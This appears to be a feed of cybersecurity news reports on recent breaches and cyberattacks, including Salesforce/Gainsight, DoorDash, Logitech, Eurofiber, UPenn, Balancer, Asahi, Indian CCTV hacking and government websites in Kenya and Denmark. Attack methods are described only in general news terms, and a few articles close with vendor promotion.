In an earlier update on October 27, 2025, Middletown reported steady progress in restoring core systems. Phone lines, Wi-Fi, and city email accounts are now fully operational, allowing staff to return to regular communication channels with residents. However, certain departments continue to rely on temporary backup processes while the broader network rebuild continues. The cyber event occurred in mid-August, prompting officials to immediately shut down affected systems and bring in third-party cybersecurity specialists to assist with secure restoration and forensic investigation.

Current Department-Level Impact

• Utility Billing: Still unable to generate new bills until system restoration is complete.
• Payments: Residents may continue paying previously issued bills via InvoiceCloud or at the City Building.
• Court Records: In-person court record searches remain available.
• Police Fingerprint Checks: Not currently available; residents may obtain checks from county, state, or federal agencies.

Data Impact and Ongoing Forensics

The city’s investigation into the cyber event continues with support from external cybersecurity experts. It remains unclear whether any resident data was affected. Officials emphasized that determining what information may have been accessed, and who may be impacted, is a complex, ongoing process. Should the investigation confirm exposure of personal information, the city will notify and assist affected individuals. Middletown also confirmed that it is coordinating with federal, state, and local law enforcement agencies throughout the investigation. At this time, there is no evidence that compromised data has been used for fraudulent activity or identity theft.

Salesforce is investigating potential unauthorized access to customers’ Salesforce data that may have occurred through the Gainsight customer success platform. “Our investigation indicates this activity may have enabled unauthorized access to certain customers’ Salesforce data through the app’s connection,” Salesforce said in an advisory today. The Salesforce advisory was short on detail, but the incident appears to share similarities with a recent OAuth-based breach of the Salesloft Drift platform that compromised the Salesforce environments of dozens, if not hundreds, of organizations. That breach was linked to the Scattered LAPSUS$ Hunters threat group. In an email exchange with The Cyber Express, Scattered LAPSUS$ Hunters also claimed responsibility for the current Gainsight incident. “Yes, we are responsible for it,” the group told The Cyber Express. “Nearly 300 organisations are affected by it.” The group named four large organizations allegedly hit in the latest incident, but it is The Cyber Express’ policy not to name unconfirmed cyberattack victims.

Salesforce Detects ‘Unusual Activity’ Involving Gainsight App

Salesforce said in the advisory that it has identified “unusual activity involving Gainsight-published applications connected to Salesforce.” Those apps are installed and managed directly by customers. “Our investigation indicates this activity may have enabled unauthorized access to certain customers’ Salesforce data through the app’s connection,” the CRM vendor said. “Upon detecting the activity, Salesforce revoked all active access and refresh tokens associated with Gainsight-published applications connected to Salesforce and temporarily removed those applications from the AppExchange while our investigation continues.” Salesforce said there is “no indication” that the incident resulted from a vulnerability in the Salesforce platform. “The activity appears to be related to the app’s external connection to Salesforce,” the company said. Salesforce said it has notified known affected customers directly and will continue to provide updates. The CRM vendor said customers who need assistance can reach the company through Salesforce Help.

Salesloft Drift Breach Affected Gainsight Too

It will be some time before the extent of the current incident is known, but the Salesloft Drift incident affected the CRM environments of scores of well-known companies, among them Google, Cloudflare, Palo Alto Networks, and many more prominent names. The Scattered LAPSUS$ threat group launched social engineering attacks on Salesforce environments too. Scattered LAPSUS$ Hunters claims 760 organizations were hit in the Salesloft Drift incident, one of which was Gainsight’s own Salesforce environment. The Cyber Express has reached out to Gainsight for comment and will update this story as new information emerges.

A disturbing case of hacking CCTV systems in India has exposed a widespread cybercrime racket through which intimate videos from a maternity ward were stolen and sold online. Police in Gujarat state say the discovery has raised concern for surveillance practices in a country where cameras are routinely placed across public and private spaces.  The case came to light earlier this year when Gujarati media outlets detected several videos on YouTube. These clips, taken inside a maternity hospital, showed pregnant women undergoing medical examinations and receiving injections in their buttocks.   Each video carried a link directing viewers to Telegram channels where longer versions of the footage could be purchased. To protect the privacy of those filmed, the city and the maternity hospital’s name have not been disclosed.  

From a Single Hospital Breach to a Nationwide Cybercrime Operation 

The hospital director told the BBC that the cameras had been installed “for the safety of doctors” and to guard against false allegations. None of the women seen in the videos has filed police complaints.  Once alerted, investigators uncovered what they described as a massive nationwide cybercrime racket. Police say hackers had infiltrated at least 50,000 CCTV systems throughout India and were selling footage taken from hospitals, schools, residential complexes, offices, malls, and even private homes.   Many of the stolen clips were marketed for prices ranging from 800 to 2,000 rupees, while some Telegram operators reportedly offered live feeds through subscription-based access. According to officers, the case demonstrates how a single CCTV hack can compromise thousands of devices due to weak digital protection. 

Arrests, Charges, and the Spread of the Network 

Arrests connected to the network have been made since February, spanning Maharashtra, Uttar Pradesh, Gujarat, Delhi, and Uttarakhand. The suspects face charges under laws addressing privacy violations, cyberterrorism, voyeurism, and the publication of obscene material. Police noted that no patient or hospital lodged an official complaint, largely due to fear of exposure and social stigma. Instead, a police officer formally initiated the case to prevent the matter from being dropped.  The breach reflects the widespread vulnerabilities built into India’s surveillance ecosystem. Many CCTV units operate with default passwords such as “Admin123,” practice investigators say aided the hackers. Officers reported that the group used brute-force tools to access networks, enabling them to capture feed from thousands of locations. Specialists advise users to periodically change IP addresses and passwords, conduct routine audits of their systems, and adopt stronger security measures for both home and professional networks. 

Growing Concerns About Surveillance and Privacy 

The proliferation of CCTV across India, from hospital wards to private apartments, has created a fertile ground for hacking CCTV incidents, exposing sensitive footage, and disproportionately affecting women, who often hesitate to report breaches due to stigma. Despite government efforts to tighten digital security, gaps remain, and this latest breach highlights how quickly insecure systems can be exploited and sensitive data spread online. Platforms like Cyble offer a proactive solution, leveraging AI-native intelligence to monitor dark web activity, detect vulnerabilities, and prevent cybercrime before it impacts victims. Organizations looking to protect their networks and gain real-time threat visibility can schedule a free demo with Cyble to experience how its agentic AI hunts, predicts, and neutralizes threats autonomously, keeping security teams ahead of hackers. 

American Food delivery platform DoorDash has disclosed a DoorDash cybersecurity incident after an unauthorized third party accessed certain user information through a targeted social engineering attack. The company confirmed that the DoorDash data breach affected an unspecified number of users but clarified that no sensitive or financial information was accessed. According to DoorDash’s public statement, the incident began when a company employee was manipulated into granting access through a social engineering scam. This reflects a rising trend where attackers exploit human behavior rather than system weaknesses, posing significant risks even to companies with mature cybersecurity programs.

DoorDash Cybersecurity Incident: Social Engineering Identified as the Root Cause

The company revealed that threat actors did not rely on malware or exploit software vulnerabilities. Instead, they used deceptive tactics to influence an employee and gain initial access. This form of attack continues to challenge organizations, as technical security controls often cannot prevent human error. DoorDash stated that its response team quickly identified the data breach, shut down unauthorized access, and initiated an internal investigation. The company has also referred the matter to law enforcement.

What Information Was Accessed in DoorDash Data Breach

DoorDash confirmed that some users, spanning consumers, Dashers, and merchants, were impacted. The type of user information accessed varied and may have included:

• First and last name
• Phone number
• Email address
• Physical address

The company emphasized that no sensitive information such as Social Security numbers, government-issued IDs, driver’s license details, bank information, or payment card data was compromised in DoorDash cybersecurity incident. DoorDash added that it has no evidence of fraud, identity theft, or misuse of the accessed information.

DoorDash Response and Security Enhancements

Following the DoorDash cybersecurity incident, the company implemented several measures to strengthen its cybersecurity posture. These steps include:

• Deploying new security system enhancements to detect and block similar malicious activities
• Increasing employee security awareness training focused on social engineering threats
• Engaging an external cybersecurity firm to assist in the investigation and provide expert guidance
• Coordinating with law enforcement for ongoing inquiry

DoorDash reiterated its commitment to improving user security, stating that it strives to “get 1% better every day” and protect user privacy through continuous improvements.

User Notifications and Support

The company noted that affected users have been notified where required under applicable laws. To address concerns and questions, DoorDash has set up a dedicated call center available in English and French for users in the U.S., Canada, and international regions. Users seeking more information can contact the hotline using reference code B155060. DoorDash also clarified that customers of Wolt or Deliveroo were not impacted by this incident, as the breach was limited exclusively to DoorDash systems and data. Guidance for Users While no sensitive data was compromised, DoorDash advised users to remain cautious of unsolicited communications requesting personal information. The company warned users to avoid clicking suspicious links or downloading unexpected attachments, as such tactics are commonly used in social engineering attacks. DoorDash stated that users do not need to take any immediate action to protect their accounts, as the compromised information was limited to basic contact details and there is no evidence of misuse.

The Government of Kenya cyberattack on Monday morning left several ministry websites defaced with racist and white supremacist messages, disrupting access for hours and prompting an urgent response from national cybersecurity teams. The cyberattack on Government of Kenya targeted multiple high-profile platforms, raising new concerns about the security of public-sector digital infrastructure. According to officials, the Government of Kenya cyberattack affected websites belonging to the ministries of Interior, Health, Education, Energy, Labour, and Water. Users attempting to access the pages were met with extremist messages including “We will rise again,” “White power worldwide,” and “14:88 Heil Hitler.”

Government of Kenya Cyberattack Under Investigation

The Interior Ministry confirmed the Government of Kenya cyberattack, stating that a group identifying itself as “PCP@Kenya” is suspected to be behind the intrusion. Several government websites were rendered temporarily inaccessible while national teams worked to secure affected systems. “Preliminary investigations indicate that the attack is suspected to have been carried out by a group identifying itself as 'PCP@Kenya',” the ministry said. “Following the incident, we immediately activated our incident response and recovery procedures, working closely with relevant stakeholders to mitigate the impact and restore access to the affected platforms.” [caption id="attachment_106846" align="aligncenter" width="533"] Source: X[/caption] Officials confirmed that the situation has since been contained, with systems placed under continuous monitoring to prevent further disruption. Citizens have been encouraged to reach out to the National KE-CIRT if they have information relevant to the breach.

Regional Cyber Issues Reported Within 24 Hours

The Kenyan incident took place just a day after Somalia reported a cyberattack on its Immigration and Citizenship Agency. Somali officials said they detected a breach involving data from individuals who had entered the country using its e-Visa system. Early findings suggest that leaked data may include names, dates of birth, photos, marital status, email addresses, and home addresses. Authorities are now assessing how many people were affected and how attackers gained access to the system. The U.S. Embassy in Somalia referenced claims from November 11, when hackers alleged they had infiltrated the e-visa system and accessed information belonging to at least 35,000 applicants — potentially including U.S. citizens. “While Embassy Mogadishu is unable to confirm whether an individual’s data is part of the breach, individuals who have applied for a Somali e-visa may be affected,” the embassy said. [caption id="attachment_106848" align="aligncenter" width="377"] Source: X[/caption]

No Claim of Responsibility So Far

As of Monday afternoon, no threat group has formally claimed responsibility for either the Kenya or Somalia cyber incidents. Investigators are assessing whether the timing suggests any form of coordination or shared exploitation methods. For now, authorities emphasize that sensitive financial information, core government systems, and essential services in Kenya were not impacted. The cyberattack on Government of Kenya appears to have been limited to public-facing platforms.

Logitech International S.A. has confirmed that it was hit by a data breach, the company said in an SEC filing late last week. Logitech’s 8-K filing released on Nov. 14 was short on details, but the company was named as a victim by the CL0P ransomware group earlier this month as part of the threat group’s campaign targeting Oracle E-Business Suite vulnerabilities. Of roughly 45 organizations claimed as victims by CL0P, only five have confirmed an attack to date: The Washington Post,  Harvard University, American Airlines’ Envoy Air, and Hitachi’s GlobalLogic. The CL0P campaign is believed to have targeted Oracle E-Business Suite vulnerability CVE-2025-61884, contrary to initial reports that the Oracle EBS vulnerability targeted was CVE-2025-61882.

Logitech Data Breach Confirmed

Logitech said in its SEC filing that the company “recently experienced a cybersecurity incident relating to the exfiltration of data.” The computer peripherals and software maker said the incident did not impact its products, business operations or manufacturing. After detecting the incident, Logitech said it investigated and responded to the incident with help from unnamed external cybersecurity firms. Logitech said the company “believes that the unauthorized third party used a zero-day vulnerability in a third-party software platform and copied certain data from the internal IT system. ... The data likely included limited information about employees and consumers and data relating to customers and suppliers. Logitech does not believe any sensitive personal information, such as national ID numbers or credit card information, was housed in the impacted IT system.” Logitech said it patched the third-party vulnerability “following its release by the software platform vendor.”

Logitech Says Cyber Insurance Will Cover Incident

The company said it doesn’t believe the incident will have a “material adverse effect” on its financial condition, in part because it holds “a comprehensive cybersecurity insurance policy, which we expect will, subject to policy limits and deductibles, cover costs associated with incident response and forensic investigations, as well as business interruptions, legal actions and regulatory fines, if any.” While only five victims have confirmed they were hit in the Oracle cyberattack campaign, the Cl0p ransomware group has claimed about 45 victims to date from the campaign on its dark web data leak site. Alleged victims claimed by CL0P have spanned a wide range of industries and organizations, including major electronics companies, energy and utility organizations, technology companies, manufacturers, medical technology companies, healthcare providers, major colleges and universities, insurers, security companies, banks, construction and engineering firms, mining companies and communications companies, among other sectors. CL0P has tended to cluster victims in campaigns targeting specific zero-day vulnerabilities throughout its six-year-history, including 267 claimed victims in February 2025 that drove ransomware attacks to record highs that month.

A cybersecurity incident at Eurofiber France was officially confirmed after the company identified unauthorized activity on November 13, 2025. The incident involved a software vulnerability that allowed a malicious actor to access data from Eurofiber France’s ticket management platform and the ATE customer portal. According to the company, the situation is now under control, with systems secured and additional protective measures implemented.

Cybersecurity Incident Impacted Ticketing Platform and ATE Portal

Eurofiber France stated that the cybersecurity incident affected its central ticket management platform used by regional brands Eurafibre, FullSave, Netiwan, and Avelia. It also impacted the ATE portal, part of Eurofiber France’s cloud services operating under the Eurofiber Cloud Infra France brand. The company confirmed that the attacker exploited a software vulnerability in this shared environment, leading to the exfiltration of customer-related data. The company emphasized that the incident is limited to customers in France using the affected platforms. Customers using Eurofiber services in Belgium, Germany, or the Netherlands, including Eurofiber Cloud Infra in the Netherlands, were not impacted. Eurofiber also noted that the effect on indirect sales and wholesale partners within France remains minimal, as most partners operate on separate systems.

Immediate Response and Containment Measures

Within hours of detecting the breach, Eurofiber France placed both the ticketing platform and the ATE portal under reinforced security. The vulnerability was patched, and additional layers of protection were deployed. The company said its internal teams, working alongside external cybersecurity experts, are now focused on assisting customers in assessing and managing the impact. Eurofiber clarified that no sensitive financial information, such as bank details or regulated critical data stored in other systems, was compromised. All services remained fully operational during the attack, and there was no disruption to customer connectivity or service availability. Customers were notified immediately after the breach was detected. Eurofiber stated it would continue to update affected organizations transparently as the investigation progresses.

Regulatory Notifications and Ongoing Investigation

In line with European regulatory requirements, Eurofiber France has notified the CNIL (France’s Data Protection Authority under GDPR) and reported the incident to ANSSI (the French National Cybersecurity Agency). A police complaint has also been filed in connection with an extortion attempt linked to the attack. The company reaffirmed its commitment to transparency, data protection, and cybersecurity throughout the remediation process.

External Research Points to Larger Data Exposure

International Cyber Digest, a third-party cybersecurity research group, reported that the breach may have exposed information belonging to approximately 3,600 customers. According to their analysis, the threat actor — who identifies as “ByteToBreach” — gained full access to Eurofiber’s GLPI database, including client data, support tickets, internal messages, passwords, and API keys. Researchers noted that Eurofiber’s GLPI installation may have been operating on versions 10.0.7–10.0.14, potentially outdated and vulnerable. The attacker, in comments shared with the researchers, claimed to have executed a slow, time-based SQL injection attack and extracted nearly 10,000 password hashes over a period of 10 days. They reportedly used administrator-level API keys to download internal documents and customer PII. ByteToBreach also claimed to have contacted both GLPI’s developer, Teclib, and Eurofiber to negotiate ransom demands. According to the research group, those attempts received no response. Eurofiber France operates over 76,000 kilometers of fiber network and 11 data centers, serving between 9,000 and 12,000 business and government customers. The company’s French clientele includes several major public institutions and private-sector organizations. Eurofiber France reiterated that all systems have now been secured and that enhanced monitoring and preventive measures are in place. The company said its teams remain fully mobilized until the cybersecurity incident is completely resolved.

A cyberattack on Danish institutions disrupted several government and defense-related websites on November 13, according to the country’s Civil Protection Agency. The incident, which involved widespread DDoS attacks, caused temporary outages across multiple online services and prompted authorities to intensify monitoring alongside Denmark’s military intelligence service.  The Civil Protection Agency reported that “several Danish companies and websites were currently experiencing outages and operating disruptions because of DDoS attacks.” As officials noted, a DDoS attack overwhelms a website’s servers by flooding them with traffic, blocking access for legitimate users. The agency said it was “following the situation closely,” indicating the scale and persistence of the disruptions.  Shortly after the cyberattack on the Danish government, the pro-Russian hacker group NoName057 reportedly claimed responsibility on social media. The group alleged it had targeted systems belonging to the Danish government, including the Ministry of Transport and the public-sector portal Borger.dk. Defense contractor Terma was also named in the claims and later confirmed that it had been affected.  Tobias Brun-Falkencrone, a spokesperson for Terma, addressed the situation cautiously. “We’re aware that a Russian hacker group has claimed that it would disrupt our website, as well as the ones of several Danish authorities, but it’s too early to say they are responsible,” he remarked. He emphasized that Terma’s systems responded effectively: “We are well geared to handle this kind of cyberattack and acted quickly. There were no security breaches and no data was lost”, reported Singaporean newspaper The Straits Times. 

Attacks Follow Earlier Disruptions Ahead of Local Elections 

The November 13 attacks came just a day after NoName057 claimed it had targeted several Danish municipal websites on November 12. These earlier disruptions occurred less than a week before Denmark’s local elections, drawing attention to the country’s strong support for Ukraine and the potential geopolitical motivations behind the digital assaults.  International reports, including coverage from AFP and Ukrinform, noted that the cyberattack on Danish institutions aligns with a broader wave of pro-Russia cyber activity affecting European nations. In the Netherlands, Russian hackers recently stole personal data from residents in a municipality.   In Poland, a payment system was breached, resulting in the theft of customer information from a major tour company. Ukrinform also highlighted an incident in which Russian state-linked hackers infiltrated systems belonging to a British defense contractor, exposing sensitive employee data on the dark web. 

Authorities Continue Monitoring Amid Rising Cyber Threats 

Although the Danish government has not reported any data loss or long-term damage, the recurring DDoS attacks highlight persistent vulnerabilities in public infrastructure and defense-linked networks. Authorities have not released detailed technical findings but remain engaged in coordinated oversight to assess potential links to broader geopolitical tensions.  The Civil Protection Agency and military intelligence continue to monitor the situation, signaling that Denmark is preparing for additional attempts to disrupt critical digital systems in the near future. 

As Japan enters its busiest beer-drinking period, the nation’s biggest brewer, Asahi Group Holdings Ltd., continues to face the brunt of the Asahi cyberattack that has crippled its operations for more than a month. The Asahi cyberattack, identified as a ransomware incident, has severely disrupted the company’s internal systems that manage online orders and shipments, forcing the brewer to fall back on manual processes and slow production to a near standstill.  According to company representatives, Asahi’s shipments have dropped to just 10 percent of normal levels as the firm processes orders in person, over the phone, and even by fax, a throwback to pre-digital business methods. The disruption comes at a critical time: December typically marks Asahi’s strongest sales period, with its signature Super Dry beer accounting for 12 percent of annual sales.  Industry analysts expect that the beer shipment data for October, due out on Thursday, will shed light on how much market share Asahi may have lost to competitors in the wake of the attack, as reported by China Daily. 

The Asahi Cyberattack Supply Struggles Hit Bars and Restaurants 

The impact of the Asahi cyberattack has been felt sharply across Tokyo’s bustling bar scene. In Shimbashi, Kohei Matsuo, owner of Bier Reise ’98, said that 80 percent of his beer sales once came from Asahi’s Maruefu brand. Within a week of the attack, he was out of stock and had to pivot to other domestic and imported beers.  “If supply doesn’t recover and I have to suspend the all-you-can-drink plan, it’s likely to hurt year-end party attendance,” Matsuo said.  Meanwhile, in Ueno, Hiroyuki Iida, manager of Izakaya Ueno Ichiba Honten, said his restaurant briefly switched to products from Sapporo Holdings Ltd. and Suntory Holdings Ltd. before receiving limited shipments of Super Dry. However, other Asahi items, including Maruefu and its non-alcoholic beers, remain unavailable.  “Wholesalers may be prioritizing larger volume accounts,” Iida noted, adding that the damage has been somewhat milder than initially feared. 

Rivals Step In 

Competitors have been quick to seize the opportunity. Kirin Holdings Co., Suntory, and Sapporo have been replacing Asahi-branded taps, glassware, and other bar equipment through wholesalers — moves that could make it harder for Asahi to reclaim its presence once supply stabilizes. Analyst Euan Mcleish of Sanford C. Bernstein Japan believes Sapporo stands to gain the most, thanks to its full-malt beer lineup.  Following the October 6 attack, Asahi even lost its No. 1 position in Japan’s retail beer market to Kirin, driven by a surge in sales of Kirin’s Ichiban Shibori brand, according to Nikkei point-of-sale data.  Kirin has adjusted its shipments to ensure a stable supply as demand grows, while Suntory confirmed receiving numerous distributor inquiries and is scaling production. Sapporo also reported ramping up shipments to meet stronger-than-expected demand. 

Retail Market Offers Mixed Picture 

Despite the widespread disruption, retail stores show a more varied situation. Some OK Corp outlets in central Tokyo continue to stock Super Dry and Maruefu, though shelves for other Asahi products are emptying fast. Major convenience store chains such as Seven & i Holdings Co., FamilyMart Co., and Lawson Inc. still have a steady supply of Super Dry, though shortages of soft drinks and energy beverages from Monster Beverage Corp., which Asahi distributes, are becoming noticeable.  Online retailers show a similar pattern: Amazon Japan lists a 24-pack of Super Dry for ¥5,040, while Aeon Co. offers a 10-can gift set for ¥2,380, with delivery scheduled between December 1 and January 10. In contrast, department stores such as Isetan Mitsukoshi Holdings Ltd. and Takashimaya Co. list many Asahi beer gifts as sold out, a setback for Japan’s year-end gifting tradition, when premium food and beverages are exchanged to express gratitude. 

Financial Fallout and Future Risks 

The Asahi cyberattack highlights how even major corporations can falter when outdated systems meet modern threats. Analyst Euan Mcleish predicts a ¥15 billion fourth-quarter loss and a 13 percent profit shortfall, while experts like Professor Tetsutaro Uehara point to Asahi’s fragmented legacy systems as a key weakness exploited during the cyberattack on Asahi.   To prevent similar crises, organizations must embrace AI-native cybersecurity built for today’s threat landscape. Platforms like Cyble, recognized by Gartner and Forrester, autonomously predict, hunt, and neutralize attacks before they strike. Businesses can book a free demo or start a complimentary external threat assessment with Cyble to uncover vulnerabilities and experience how AI that hunts, thinks, and protects keeps them a step ahead of the next cyber threat. 

The University of Pennsylvania has confirmed that a hacker stole sensitive university data during a recent cyberattack. The breach, first detected on October 31, 2025, resulted in unauthorized access to systems connected to the university’s development and alumni activities.  Initially, the University of Pennsylvania dismissed reports of a hack as “fraudulent.” However, officials later acknowledged that data was indeed taken. In a statement released to alumni and shared publicly, the university explained that staff “rapidly locked down the systems and prevented further unauthorized access; however, not before an offensive and fraudulent email was sent to our community and information was taken by the attacker.” 

The University of Pennsylvania Breach and Attack Details

The attackers gained access through a social engineering technique, a method that deceives individuals into revealing their credentials. Once inside, the hackers sent a mass email from official university addresses. The email read: “We got hacked. We love breaking federal laws like FERPA (all your data will be leaked). Please stop giving us money.”  According to reports, the hackers compromised a PennKey single sign-on account, which allowed them access to multiple internal systems, including the university’s VPN, Salesforce databases, SAP systems, and SharePoint files. This access reportedly lasted for nearly two days, from October 30 to October 31, before being detected and contained.  An internal source revealed that the university requires multi-factor authentication (MFA) for students, staff, and alumni accounts as a security measure. However, some senior officials were allegedly granted exemptions from the MFA requirement.  When asked about the MFA exemptions or adoption rates, a university spokesperson declined to comment beyond the official data incident page. 

Scope of the Data Theft

While the full scope of the data breach remains unclear, reports suggest that as many as 1.2 million records may have been compromised. The stolen data reportedly includes names, contact details, donation records, estimated net worth, and demographic information such as race, religion, and sexual orientation. The hacker also claimed to have accessed documents related to donor activities and bank transaction receipts.  Although the university is still assessing the damage, officials confirmed that medical systems operated by Penn Medicine were not affected. As required by law, the university will contact individuals whose personal data was compromised, though no timeline has been announced. 

Investigation and Legal Fallout

The University of Pennsylvania has reported the incident to the Federal Bureau of Investigation (FBI) and enlisted third-party cybersecurity experts to assist in the investigation. Despite these actions, the university is already facing potential legal consequences. At least one class-action lawsuit has been filed by former students, accusing the university of negligence in protecting personal data.  The hackers’ motivations appear mixed. In the initial message to the university community, the attackers criticized legacy admissions and affirmative action policies, stating, “We hire and admit morons because we love legacies, donors, and unqualified affirmative action admits.” However, further statements from the group indicate their primary motive was financial, aiming to profit from the stolen data rather than make a political statement. 

Balancer V2, one of the most prominent automated market makers (AMMs), has suffered a large-scale security incident. The Balancer data breach exposed a critical Balancer vulnerability within its smart contract infrastructure, allowing an attacker to siphon as much as $128 million worth of digital assets from the platform in minutes.  The Balancer data breach stemmed from a flaw in the V2 vault and its liquidity pools. Investigations by blockchain analysts revealed that a maliciously deployed contract exploited Balancer’s pool initialization process. This contract manipulated internal calls in the vault, bypassing protection meant to prevent unauthorized swaps or balance changes.  The vulnerability was tied to a faulty check in the manageUserBalance function, where the internal validation mechanism (_validateUserBalanceOp) could be bypassed. By exploiting this loophole, the attacker was able to specify unauthorized parameters and drain funds from the vault without proper permission.  The attack began with a series of rapid Ethereum mainnet transactions before expanding across several networks. The composable design of Balancer V2, where multiple pools share a single vault, amplified the impact, making it easier for the exploit to spread. 

Extent of the Balancer Data Breach

Preliminary data shows the attacker stole between $110 million and $116 million, with some estimates reaching $128 million, making it one of the largest DeFi exploits of 2025.  The stolen assets included several liquid staking derivatives and wrapped tokens such as WETH, wstETH, osETH, frxETH, rsETH, and rETH. Most of the funds—around $70 million- were drained from the Ethereum mainnet, while the Base and Sonic networks lost approximately $7 million combined. Other chains accounted for at least $2 million in additional losses.  On-chain activity shows that the stolen assets were funneled into newly created wallets, with funds later moved through cross-chain bridges and likely laundered through privacy mixers.  Despite the extensive nature of the Balancer vulnerability, investigators confirmed that no private keys were compromised; the breach was purely a smart contract exploit. 

Security Audits and Community Reactions

What makes the Balancer hack particularly interesting is that the protocol had undergone more than ten independent audits. Its V2 vault was reviewed three separate times by different security firms. Yet the exploit still occurred, a fact that has reignited debate over the reliability of DeFi audits.  Suhail Kakar noted on X (formerly Twitter):  “Balancer went through 10+ audits. The vault was audited three separate times by different firms—still got hacked for $110M. This space needs to accept that ‘audited by X’ means almost nothing. Code is hard, DeFi is harder.”  Other blockchain researchers echoed similar concerns, emphasizing that composable DeFi systems—where smart contracts interact in complex, interdependent ways—create additional attack vectors even when individual components appear secure.  This is not Balancer’s first security challenge. The platform previously suffered smaller incidents, including a $520,000 exploit in June 2020, an $11.9 million attack in March 2023, and a $2.1 million loss in August 2023 due to precision vulnerabilities in its V2 Boosted Pools. 

User Warnings and Aftermath

Experts urged users exposed to Balancer V2 pools to take immediate precautions: 

1. Withdraw funds from affected pools as soon as possible. 
2. Revoke smart contract approvals for Balancer-related addresses via platforms such as Revoke, DeBank, or Etherscan. 
3. Monitor wallet activity using tools like Dune Analytics or Etherscan to spot unusual transactions. 
4. Stay informed by following updates from auditors and blockchain security firms such as PeckShield and Nansen. 

The impact of the Balancer hack was felt across the broader DeFi market. The BAL token dropped by roughly 5–10% in value, and Balancer’s total value locked (TVL) decreased sharply as liquidity providers withdrew funds amid growing uncertainty. 

Bengaluru’s Central Crime Branch (CCB) has dismantled a major international cybercrime racket, revealing a hacking operation that siphoned off ₹47 crore (approximately $5.6 million) from a private finance company in just two and a half hours. The Cyber Crime Wing of the CCB confirmed the arrest of two individuals involved in the scam, while the primary masterminds are suspected to be based in Dubai. 

Massive Heist in Just Two and a Half Hours 

The financial breach occurred on the night of October 6, when hackers infiltrated the systems of Wisdom Finance Pvt. Ltd. and executed 1,782 unauthorized transactions within a span of two and a half hours. The stolen funds were funneled into 656 different bank accounts across India.  According to the complaint filed by a senior manager of Wisdom Finance, the transactions did not originate from the firm’s official systems or registered IP addresses. Instead, they were traced to foreign IPs, notably from Hong Kong and Lithuania.  City Police Commissioner Seemant Kumar Singh stated, “This is the first of its kind of case cracked by the CCB team. We have gathered the details of the accused in Dubai, and efforts are on to track them down.” The police also announced a partial recovery of ₹10 crore (approximately $1.2 million) from the stolen funds.

Local Arrests Expose the Indian End of the Cybercrime Racket 

The Cyber Crime Wing investigation led to two arrests in India who acted as facilitators in the cybercrime racket. The first suspect, Sanjay Patel, a 43-year-old plumber from Udaipur, Rajasthan, allegedly supplied “mule accounts” used for laundering stolen funds in exchange for commission. Authorities traced Patel after detecting a suspicious transfer of ₹27,39,000 (around $33,000) into a State Bank of India account linked to him, as reported by The Hindu. Further investigation uncovered another major transaction of ₹5.5 crore (about $650,000) transferred from Wisdom Finance to Unknown Technologies Pvt. Ltd., a Hyderabad-based company. The funds were later routed through a private bank account belonging to another individual.  These transfers were traced to IP addresses hosted by Webyne Data Centre, revealing a crucial digital trail. Police later identified Ismail Rasheed Attar, a 27-year-old digital marketing executive from Belagavi, as the person who had purchased the IP addresses used during the heist. Attar, a high school dropout, was arrested shortly after. 

Dubai-Based Masterminds Hired Global Hackers 

Investigations by the Cyber Crime Wing revealed that two Dubai-based masterminds orchestrated the attack. They reportedly rented five servers using the IP addresses obtained from Attar and then hired hackers from Hong Kong to infiltrate Wisdom Finance’s API systems. By exploiting security vulnerabilities, the hackers bypassed the company’s internal defenses and initiated the massive fund transfer.  The CCB suspects that the Dubai-based operators coordinated their activities using encrypted communication platforms and cryptocurrency wallets to pay the international hackers. The stolen money was quickly moved through hundreds of mule accounts, making it difficult to trace.  Although the two arrested suspects were low-level operatives, the evidence recovered—including IP logs, bank transaction records, and communication data—has provided investigators with leads on the larger network. 

Cross-Border Coordination to Combat Cybercrime Rackets 

The Cyber Crime Wing continues to collaborate with international law enforcement agencies to locate the primary culprits and recover the remaining funds. Officials noted that this case highlights the global and organized nature of cybercrime rackets, which often operate across multiple countries using advanced technology and digital anonymity.  Law enforcement authorities also issued a warning to businesses to tighten their cybersecurity systems, particularly those engaged in large-scale online transactions. They urged financial institutions to implement stricter monitoring tools to detect suspicious activities, especially during late-night hours when such breaches are more likely to occur. 

WazirX, one of India’s popular cryptocurrency exchanges, is set to restart its operations on October 24, nearly 15 months after a cyberattack forced the platform to halt all activities. The decision to resume trading follows the approval of WazirX’s restructuring plan by Singapore’s High Court. In July 2024, WazirX experienced a devastating cyberattack that resulted in the loss of approximately 45% of its crypto assets, valued at $234 million. This breach compelled the platform to suspend its operations indefinitely, leaving its user base without access to trading or withdrawals during a period when the cryptocurrency market witnessed substantial growth. Token prices surged across the board, increasing the stakes for users awaiting the platform’s reopening.

Court Approval and Restructuring Scheme 

Earlier this year, WazirX proposed a restructuring scheme aimed at recovering and redistributing tokens covering nearly 85% of creditors’ balances. This plan requires majority approval from its user base. Following a re-vote in August, a striking 95.7% of voting creditors, accounting for 94.6% by value, endorsed the revised scheme.  The High Court of Singapore officially sanctioned the restructuring plan in mid-October, paving the way for the exchange’s return to the market. This court’s approval was a critical step for WazirX, as it legitimizes the company’s approach to restoring user funds and relaunching services. 

WazirX Relaunch Strategy and User Benefits 

WazirX’s comeback will begin with selecting crypto-to-crypto trading pairs, along with the USD/INR pair, with plans to expand market offerings gradually. To incentivize users during this relaunch phase, WazirX is introducing a "Restart Offer," which waives trading fees across all pairs for users.  While the exchange token rebalancing page is currently live, enabling users to view their adjusted holdings, WazirX is still finalizing features related to withdrawals and trading. In preparation for the relaunch, the platform completed a series of technical updates, including token swaps, mergers, delisting, migration, and any necessary rebranding.  To upgrade security and transparency moving forward, WazirX has partnered with BitGo, a well-known digital asset trust company, to safeguard users’ funds more effectively. 

Reaffirming Commitment 

Nischal Shetty, the founder of WazirX, addressed the community on the occasion of the relaunch. Expressing gratitude for the users’ patience during the difficult period, Shetty highlighted the company’s dedication to making cryptocurrency accessible to every Indian.  “This isn’t just a return to operations; it’s a reinforcement of our integrity, which we’ve always strived for,” Shetty remarked. His message underscored the exchange’s determination not only to resume trading but to emerge stronger and more reliable in the crypto landscape.  The resumption of WazirX’s operations marks a notable recovery from one of the most challenging periods the exchange has faced. The cyberattack in mid-2024 had a profound impact on both the company and its users, but the successful court-approved restructuring and partnership with BitGo suggest a more secure and transparent future. 

